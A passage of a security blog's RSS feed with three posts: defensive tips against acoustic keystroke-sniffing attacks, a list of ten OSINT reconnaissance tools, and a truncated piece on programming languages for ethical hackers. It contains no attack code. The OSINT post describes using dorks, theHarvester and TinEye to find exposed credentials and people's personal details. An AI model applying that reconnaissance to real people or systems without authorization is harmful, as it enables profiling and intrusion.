<figure id="attachment_49880" aria-describedby="caption-attachment-49880" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class="wp-image-49880 size-full" src="https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-2.jpg" alt="Keystroke sounds can reveal passwords to hackers" width="800" height="450" srcset="https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-2.jpg 800w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-2-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-2-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-2-750x422.jpg 750w" sizes="(max-width: 800px) 100vw, 800px" title="Careful!  Keystroke sounds can reveal passwords to hackers 6"/><figcaption id="caption-attachment-49880" class="wp-caption-text">Hackers can carry out this attack via Zoom</figcaption></figure>
<p>This is a quite feasible scenario, because in today&#8217;s digital age, we often use online meeting support applications to work or study.  In addition, we also have the habit of typing passwords while in these meetings, to log in to other accounts or applications.  This causes <strong>Keystroke sounds can reveal passwords to hackers</strong> Easily.</p>
<p>The researchers used computers from the company that brags the most about privacy and security: Apple.  They pressed 36 individual keys on a MacBook Pro, each key a total of 25 times, then ran the recordings through software to identify small differences between each key.</p>
<p>It took some trial and error to reach the final result, but after testing, the researchers were able to identify keystrokes with 95% accuracy from an iPhone and 93% using Zoom</p>
<h2 id="ftoc-nhung-khuyen-nghi-de-bao-ve-mat-khau-cua-nguoi-dung" class="ftwp-heading"><strong>Recommendations for protecting user passwords</strong></h2>
<p>Passwords are one of the important factors to protect users&#8217; personal information and accounts online.  If you reveal your password <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fhacker-an-malware-vao-hinh-anh-va-thuc-thi-nhu-the-nao%2F" class="local-link" rel="noopener">hacker</a>you may experience serious consequences, such as:</p>
<ul>
<li>Unauthorized access to important accounts, such as email, banking, social networks&#8230;</li>
<li>Personal information or money stolen</li>
<li>Taking advantage of identity to commit illegal acts</li>
</ul>
<p>Therefore, you need to take measures to protect your password from hacker attacks.  Here are some recommendations that you can apply:</p>
<h3 id="ftoc-su-dung-cac-ung-dung-quan-ly-mat-khau" class="ftwp-heading"><strong>Use password management applications</strong></h3>
<p>You can use password management applications to create and store different, secure passwords for different accounts.</p>
<figure id="attachment_49881" aria-describedby="caption-attachment-49881" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class="wp-image-49881 size-full" src="https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-3.jpg" alt="Keystroke sounds can reveal passwords to hackers" width="800" height="450" srcset="https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-3.jpg 800w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-3-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-3-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-3-750x422.jpg 750w" sizes="(max-width: 800px) 100vw, 800px" title="Careful!  Keystroke sounds can reveal passwords to hackers 7"/><figcaption id="caption-attachment-49881" class="wp-caption-text">It is recommended to use password management applications</figcaption></figure>
<p>These applications will help you create random, long and complex passwords that are not easy to guess or break by hackers.  You can also access your passwords conveniently and securely, just remember a single master password.</p>
<h3 id="ftoc-khong-su-dung-cac-mat-khau-de-doan" class="ftwp-heading"><strong>Don&#8217;t use easy-to-guess passwords</strong></h3>
<p>You should not use passwords that are easy to guess or related to personal information, such as name, date of birth, phone number, etc. These passwords are easy to be detected by hackers.  In addition, you should also avoid using common passwords, such as 123456, password, abcdef, etc.</p>
<figure id="attachment_49882" aria-describedby="caption-attachment-49882" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" loading="lazy" class="wp-image-49882 size-full" src="https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-4.jpeg" alt="Keystroke sounds can reveal passwords to hackers" width="800" height="533" srcset="https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-4.jpeg 800w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-4-300x200.jpeg 300w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-4-768x512.jpeg 768w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-4-750x500.jpeg 750w" sizes="auto, (max-width: 800px) 100vw, 800px" title="Careful!  Keystroke sounds can reveal passwords to hackers 8"/><figcaption id="caption-attachment-49882" class="wp-caption-text">Don&#8217;t use easy-to-guess passwords</figcaption></figure>
<h3 id="ftoc-kich-hoat-xac-minh-hai-yeu-to-2fa" class="ftwp-heading"><strong>Enable two-factor verification (2FA)</strong></h3>
<p>2FA is an extra layer of protection for your password, requiring you to enter an additional verification code sent to your phone, email or app when logging into accounts.  Thanks to that, even if hackers get your password, they still cannot access your account without the verification code.</p>
<h3 id="ftoc-khong-go-mat-khau-khi-dang-tham-gia-cac-cuoc-hop-truc-tuyen-hoac-khi-co-nguoi-la-xung-quanh" class="ftwp-heading"><strong>Do not type your password while participating in online meetings or when strangers are around</strong></h3>
<p>You should wait until the meeting is over or out of earshot of the stranger before entering your password.  This will help you avoid typing sounds that could reveal your password to hackers.</p>
<h3 id="ftoc-tat-micro-va-khong-de-micro-gan-ban-phim-khi-go-mat-khau" class="ftwp-heading"><strong>Turn off the microphone and do not place it near the keyboard when typing a password</strong></h3>
<p>You should turn off the microphone when you have nothing to say in online meetings, to minimize noise and avoid revealing the sound from the keyboard to hackers.  You should also keep the microphone away from the keyboard when typing a password, to reduce the sound intensity and make it difficult for hackers to analyze.</p>
<h3 id="ftoc-luu-y" class="ftwp-heading"><strong>Note</strong></h3>
<p>Additionally, you should also follow the usual security tips: Don&#8217;t click on strange links, don&#8217;t open emails from unknown senders, don&#8217;t download and open files that you&#8217;re not sure are safe or not, etc.</p>
<p>If you can log in to your account using a face scan or fingerprint scan, you won&#8217;t have to worry about any entered passwords.  You can also run white noise near your devices, this way any hacker recordings will be disabled.</p>
<h2 id="ftoc-loi-ket" class="ftwp-heading"><strong>Epilogue</strong></h2>
<p>So I have explained to you how <strong>Keystroke sounds can reveal passwords to hackers</strong>, they use AI to analyze keyboard sounds and steal users&#8217; passwords.  Therefore, you should not be subjective or negligent when using passwords, because hackers are always looking for ways to take advantage of vulnerabilities to steal their passwords.  So do you take any measures to protect your password?  Please share in the comments section below!</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;49877&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;C\u1ea9n th\u1eadn! Ti\u1ebfng g\u00f5 ph\u00edm c\u00f3 th\u1ec3 ti\u1ebft l\u1ed9 m\u1eadt kh\u1ea9u cho hacker&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/careful-keystroke-sounds-can-reveal-passwords-to-hackers/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Top 10 OSINT Tools for Hackers</title>
		<link>https://en.anonyviet.com/top-10-osint-tools-for-hackers/</link>
					<comments>https://en.anonyviet.com/top-10-osint-tools-for-hackers/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 05 Apr 2023 00:38:14 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[OSINT]]></category>
		<category><![CDATA[tools]]></category>
		<category><![CDATA[Top]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=12036</guid>

					<description><![CDATA[OSINT stands for &#8220;open source intelligence&#8221;, which is the activity of finding information that you can access through publicly available data sources on the Internet such as from Google, Bing or specialized search engines. Pentesters use OSINT to research targets or learn about cyber threats. OSINT is an important tool for both Red Team and [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>OSINT stands for &#8220;open source intelligence&#8221;, which is the activity of finding information that you can access through publicly available data sources on the Internet such as from Google, Bing or specialized search engines.  Pentesters use OSINT to research targets or learn about cyber threats.  OSINT is an important tool for both Red Team and Blue Team.  So in this article, I will introduce you to the top 10 OSINT tools for hackers.<br /><img post-id="12036" fifu-featured="1" decoding="async" class="size-full wp-image-46104 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/anonyviet-10.jpg" alt="Top 10 OSINT Tools for Hackers" title="Top 10 OSINT Tools for Hackers" width="675" height="450" srcset="https://anonyviet.com/wp-content/uploads/2023/03/anonyviet-10.jpg 675w, https://anonyviet.com/wp-content/uploads/2023/03/anonyviet-10-300x200.jpg 300w" sizes="(max-width: 675px) 100vw, 675px" title="Top 10 OSINT Tools for Hackers 16"/></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet </span> ???? <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  ????</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-top-10-cong-cu-osint-danh-cho-hacker" class="ftwp-heading">Top 10 OSINT Tools for Hackers</h2>
<h3 id="ftoc-1-shodan" class="ftwp-heading">1. Shodan</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46106 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/Shodan-GiardiniBlog.jpg" alt="Top 10 OSINT Tools for Hackers 15" width="595" height="384" srcset="https://anonyviet.com/wp-content/uploads/2023/03/Shodan-GiardiniBlog.jpg 595w, https://anonyviet.com/wp-content/uploads/2023/03/Shodan-GiardiniBlog-300x194.jpg 300w" sizes="auto, (max-width: 595px) 100vw, 595px" title="Top 10 OSINT Tools for Hackers 17"/></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.shodan.io%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Shodan</a> is a search engine for open devices on the internet, such as servers and IoT devices.  These are devices that are publicly accessible to you.  If the device is connected to the internet without careful security configuration, it can be found through Shodan.</p>
<p>The free Shodan version will limit the number of results.  So the paid version is much more useful if you need to find servers, networking devices, and IoT peripherals (such as cameras).</p>
<h3 id="ftoc-2-maltego" class="ftwp-heading">2. Maltego</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46107 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/Maltego-Logo-Compact-Greyblue.png" alt="Top 10 OSINT Tools for Hackers 16" width="480" height="300" srcset="https://anonyviet.com/wp-content/uploads/2023/03/Maltego-Logo-Compact-Greyblue.png 480w, https://anonyviet.com/wp-content/uploads/2023/03/Maltego-Logo-Compact-Greyblue-300x188.png 300w" sizes="auto, (max-width: 480px) 100vw, 480px" title="Top 10 OSINT Tools for Hackers 18"/></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.maltego.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Maltego</a> available on Windows, Mac, and Linux, giving users access to multiple data sources for OSINT, data research, and digital forensics purposes.  There are over 58 data sources in Maltego including Google Maps, AlienVault OTX, ATII Hades Darkweb Intelligence, Blockchain.info, Crowdstrike, VirusTotal, etc.</p>
<p>The value that Maltego brings to you lies not only in huge data sources, but also in data patterns and trends through visualization.  Of course, all the features of Maltego are not free, but I think the Maltego Community Edition version is enough for newbies.</p>
<h3 id="ftoc-3-google-dorks" class="ftwp-heading">3. Google Dorks</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46108 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/473d6c7229fafaeeafc070a435522f88.jpg" alt="Top 10 OSINT Tools for Hackers 17" width="800" height="500" srcset="https://anonyviet.com/wp-content/uploads/2023/03/473d6c7229fafaeeafc070a435522f88.jpg 800w, https://anonyviet.com/wp-content/uploads/2023/03/473d6c7229fafaeeafc070a435522f88-300x188.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/03/473d6c7229fafaeeafc070a435522f88-768x480.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/03/473d6c7229fafaeeafc070a435522f88-750x469.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px" title="Top 10 OSINT Tools for Hackers 19"/></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fgoogle-dork-la-gi-cap-danh-google-hacking-dork%2F" class="local-link" rel="noopener">Google Dork</a> It&#8217;s not an app, it&#8217;s a technique using Google.  Although it&#8217;s not an app, there are developers who have developed open source software tools for Google Dorking that you can try, such as Pagodo and GoogleDorker.</p>
<p>Most people just type keyword strings into Google, such as “Vietnam weather” or “anonyviet”.  But there are some search operators that you can use in Google.  For example, you can try “site:anonyviet.com” to search for content within the anonyviet website, or use quotes around a search term to only return results containing that exact word.  You can see more list of operators of Google Dork <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fsupport.google.com%2Fwebsearch%2Fanswer%2F2466433" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here</a>.</p>
<p>A lot of websites are configured with very poor security.  Google&#8217;s crawling bots visit these sites in search of content.  So Google Dorking can be a useful technique for you to find data like email addresses, login information and phone numbers that are not properly secured.</p>
<h3 id="ftoc-4-recon-ng" class="ftwp-heading">4. Recon-ng</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46109 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/recon.png" alt="Top 10 OSINT Tools for Hackers 18" width="830" height="469" srcset="https://anonyviet.com/wp-content/uploads/2023/03/recon.png 830w, https://anonyviet.com/wp-content/uploads/2023/03/recon-300x170.png 300w, https://anonyviet.com/wp-content/uploads/2023/03/recon-768x434.png 768w, https://anonyviet.com/wp-content/uploads/2023/03/recon-750x424.png 750w" sizes="auto, (max-width: 830px) 100vw, 830px" title="Top 10 OSINT Tools for Hackers 20"/></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Flanmaster53%2Frecon-ng" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Recon-ng</a> is an open source web reconnaissance tool.  Its strength lies in the fact that you can install additional modules into this tool.  If you use Recon-ng efficiently, you can save a lot of time in your OSINT work.</p>
<p>Recon-ng can be run from the terminal.  If you want to add more power to Recon-ng, select Marketplace from the main menu and install the modules you want.</p>
<h3 id="ftoc-5-ahmia-fi" class="ftwp-heading">5. Ahmia.fi</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46110 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/images.png" alt="Top 10 OSINT Tools for Hackers 19" width="318" height="159" srcset="https://anonyviet.com/wp-content/uploads/2023/03/images.png 318w, https://anonyviet.com/wp-content/uploads/2023/03/images-300x150.png 300w" sizes="auto, (max-width: 318px) 100vw, 318px" title="Top 10 OSINT Tools for Hackers 21"/></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fahmia.fi%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Ahmia.fi</a> is a search engine dedicated to finding websites on the Tor Network, although the search engine itself is accessible on the “clearnet”.  But you&#8217;ll need the Tor Browser to open your search results.</p>
<p>There are many black markets and forums on the Tor Network, so using Ahmia.fi effectively will help with your OSINT investigation.</p>
<h3 id="ftoc-6-wayback-machine" class="ftwp-heading">6. Wayback Machine</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46111 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/The-Wayback-Machine-website..jpg" alt="Top 10 OSINT Tools for Hackers 20" width="591" height="306" srcset="https://anonyviet.com/wp-content/uploads/2023/03/The-Wayback-Machine-website..jpg 591w, https://anonyviet.com/wp-content/uploads/2023/03/The-Wayback-Machine-website.-300x155.jpg 300w" sizes="auto, (max-width: 591px) 100vw, 591px" title="Top 10 OSINT Tools for Hackers 22"/></p>
<p>The Wayback Machine is a search engine for over 632 billion web pages, many of which date back to the 1990s.</p>
<p>Archive.org is using the Wayback Machine to archive as many web pages as possible.  You can also use their website to manually host websites that are currently online.  If these sites are deleted or down, you can find a copy of them stored in the Wayback Machine.</p>
<h3 id="ftoc-7-theharvester" class="ftwp-heading">7. theHarvester</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46112 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/download.jpg" alt="Top 10 OSINT Tools for Hackers 21" width="328" height="154" srcset="https://anonyviet.com/wp-content/uploads/2023/03/download.jpg 328w, https://anonyviet.com/wp-content/uploads/2023/03/download-300x141.jpg 300w" sizes="auto, (max-width: 328px) 100vw, 328px" title="Top 10 OSINT Tools for Hackers 23"/></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Flaramies%2FtheHarvester" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">theHarvester</a> is another useful open source scouting tool that you can install from GitHub.  It can be used to collect email addresses, servers, subdomains, employee names and ports from various public sources such as search engines, PGP and Shodan.</p>
<p>You can easily run theHarvester from your command line.  This tool has a special set of options for you to explore the data in the DNS server.  DNS servers have a lot of useful information because they associate domain names with specific IP addresses.</p>
<p>Some of the data sources you can explore with theHarvester include LinkedIn, Bing, Google, and VirusTotal.</p>
<h3 id="ftoc-8-tineye" class="ftwp-heading">8. TinEye</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46113 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/file-nWxjbWjbvK.jpg" alt="Top 10 OSINT Tools for Hackers 22" width="1013" height="672" srcset="https://anonyviet.com/wp-content/uploads/2023/03/file-nWxjbWjbvK.jpg 1013w, https://anonyviet.com/wp-content/uploads/2023/03/file-nWxjbWjbvK-300x199.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/03/file-nWxjbWjbvK-768x509.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/03/file-nWxjbWjbvK-750x498.jpg 750w" sizes="auto, (max-width: 1013px) 100vw, 1013px" title="Top 10 OSINT Tools for Hackers 24"/></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftineye.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">TinEye</a> is a powerful tool for image analysis.  If you have a photo on your device, you can upload it to TinEye and see if the photo is being used on another web.</p>
<p>Specific use cases: Find other people&#8217;s information from their photo, the location where the photo was taken, or the app used to take the photo.</p>
<h3 id="ftoc-9-osint-framework" class="ftwp-heading">9. OSINT Framework</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46114 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/osint-framework-1.jpg" alt="Top 10 OSINT Tools for Hackers 23" width="800" height="428" srcset="https://anonyviet.com/wp-content/uploads/2023/03/osint-framework-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2023/03/osint-framework-1-300x161.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/03/osint-framework-1-768x411.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/03/osint-framework-1-750x401.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px" title="Top 10 OSINT Tools for Hackers 25"/></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fosintframework.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">OSINT Framework</a> is the perfect web app if you&#8217;re not sure what OSINT data source you&#8217;ll need to use to find the information you want.  The OSINT Framework provides you with potential data sources that you can use.</p>
<p>You can analyze malicious files, usernames, geolocations, IP addresses, domains, IRCs, Dark Web, big data, threat information, phone numbers or more with this tool.  OSINT Framework can be the first step in your OSINT journey.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46105 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/03/osint-framework.jpg" alt="Top 10 OSINT Tools for Hackers 24" width="800" height="428" srcset="https://anonyviet.com/wp-content/uploads/2023/03/osint-framework.jpg 800w, https://anonyviet.com/wp-content/uploads/2023/03/osint-framework-300x161.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/03/osint-framework-768x411.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/03/osint-framework-750x401.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px" title="Top 10 OSINT Tools for Hackers 26"/></p>
<h3 id="ftoc-10-thu-vien" class="ftwp-heading">10. Library</h3>
<p>The best offline data source is a library.  You can visit the library, or the library&#8217;s website can help you directly find the information you are looking for.</p>
<p>There is a lot of information that has not been digitized at the library such as magazines, newspapers and directories.  In Ho Chi Minh, you can go to the General Science library.  Sign up for a membership card and you can spend the day in the library.  I often come here to run the deadline again :v.</p>
</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;46103&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;Top 10 c\u00f4ng c\u1ee5 OSINT d\u00e0nh cho Hacker&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/top-10-osint-tools-for-hackers/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2023/03/anonyviet-10.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Top 5 Programming Languages ​​White Hat Hackers Should Learn</title>
		<link>https://en.anonyviet.com/top-5-programming-languages-white-hat-hackers-should-learn/</link>
					<comments>https://en.anonyviet.com/top-5-programming-languages-white-hat-hackers-should-learn/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 30 Jan 2023 22:23:37 +0000</pubDate>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[Hat]]></category>
		<category><![CDATA[Languages]]></category>
		<category><![CDATA[Learn]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Top]]></category>
		<category><![CDATA[White]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7016</guid>

					<description><![CDATA[The 21st century is the century of digital citizens as technology has become the most important aspect of our lives. Having knowledge of programming has become more of a necessity than an option, white hat hackers are also becoming extremely popular these days. Programming Language White Hat Hacker Should Learn a lot, but AnonyViet will [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>The 21st century is the century of digital citizens as technology has become the most important aspect of our lives.  Having knowledge of programming has become more of a necessity than an option, white hat hackers are also becoming extremely popular these days.  Programming Language White Hat Hacker Should Learn a lot, but AnonyViet will introduce TOP 5 languages ​​you should learn.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Nowadays everyone wants to become a hacker, especially young people, but the truth is that hacking and becoming a hacker is not as easy as shown in many movies, in fact it takes years of practice and programming. program to become a hacker.  Have some <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F%3Fs%3Dng%25C3%25B4n%2Bng%25E1%25BB%25AF%2Bl%25E1%25BA%25ADp%2Btr%25C3%25ACnh" rel="noopener noreferrer" class="local-link">programming language</a> favored by white hat hackers to do their job.  Increasing cyber attacks have increased the demand for White Hat Hackers and they also get paid a lot.  So where should one start, the answer would be by starting to write in one of the programming languages ​​suitable for Ethical Hacking purposes.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2020%2F11%2Fngon-ngu-lap-trinh-hacker-nen-hoc.jpg" rel="noopener" class="local-link"><img post-id="7016" fifu-featured="1" decoding="async" class="aligncenter wp-image-23529 size-full" src="https://anonyviet.com/wp-content/uploads/2020/11/ngon-ngu-lap-trinh-hacker-nen-hoc.jpg" alt="Top 5 Programming Languages ​​White Hat Hackers Should Learn" title="Top 5 Programming Languages ​​White Hat Hackers Should Learn" width="590" height="366" srcset="https://anonyviet.com/wp-content/uploads/2020/11/ngon-ngu-lap-trinh-hacker-nen-hoc.jpg 590w, https://anonyviet.com/wp-content/uploads/2020/11/ngon-ngu-lap-trinh-hacker-nen-hoc-300x186.jpg 300w" sizes="(max-width: 590px) 100vw, 590px" title="Top 5 Programming Languages ​​White Hat Hackers Should Learn 6"/></a></p>
<h2 id="ftoc-python" class="ftwp-heading">Python</h2>
<p>If you often use the above Hacker tools <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2F" rel="noopener noreferrer external nofollow" class="ext-link" onclick="this.target='_blank';">Github</a>you will see <strong>80%</strong> are all written in Python.  Python is a programming language that Hackers use quite a lot because it is the easiest to learn and famous worldwide in the programming community for its simplicity.  It has played an important role in writing hacking scripts, exploits and malicious programs and is therefore known as<strong> “de-facto language”</strong>(<strong>“de-facto language”)</strong> for programming hacks.</p>
<p>Python sockets can be used to find system vulnerabilities because Python code can be used to check the security integrity of the system and it can also be used to exploit them.  It has a huge super community and tons of pre-built libraries with powerful functions that make writing automation scripts, prototyping, etc. a lot easier.</p>
<p style="text-align: center;"><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.fshare.vn%2Ffile%2FUIQVXRP2US51%3Ftoken%3D1606750131" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"><span style="text-decoration: underline;"><strong>Download free Python course</strong></span></a></p>
<h3 id="ftoc-diem-noi-bat" class="ftwp-heading"><span style="color: #339966;"><strong>Highlights:</strong></span></h3>
<p>Python has an interpreted nature that allows it to run without compiling, an easy language to learn that is very useful for beginner white hat hackers.  Allows easy writing of automation scripts to break into web servers and make prototyping much faster.  For quick target exploration with the help of many third-party plugins and libraries.</p>
<h2 id="ftoc-java" class="ftwp-heading">Java</h2>
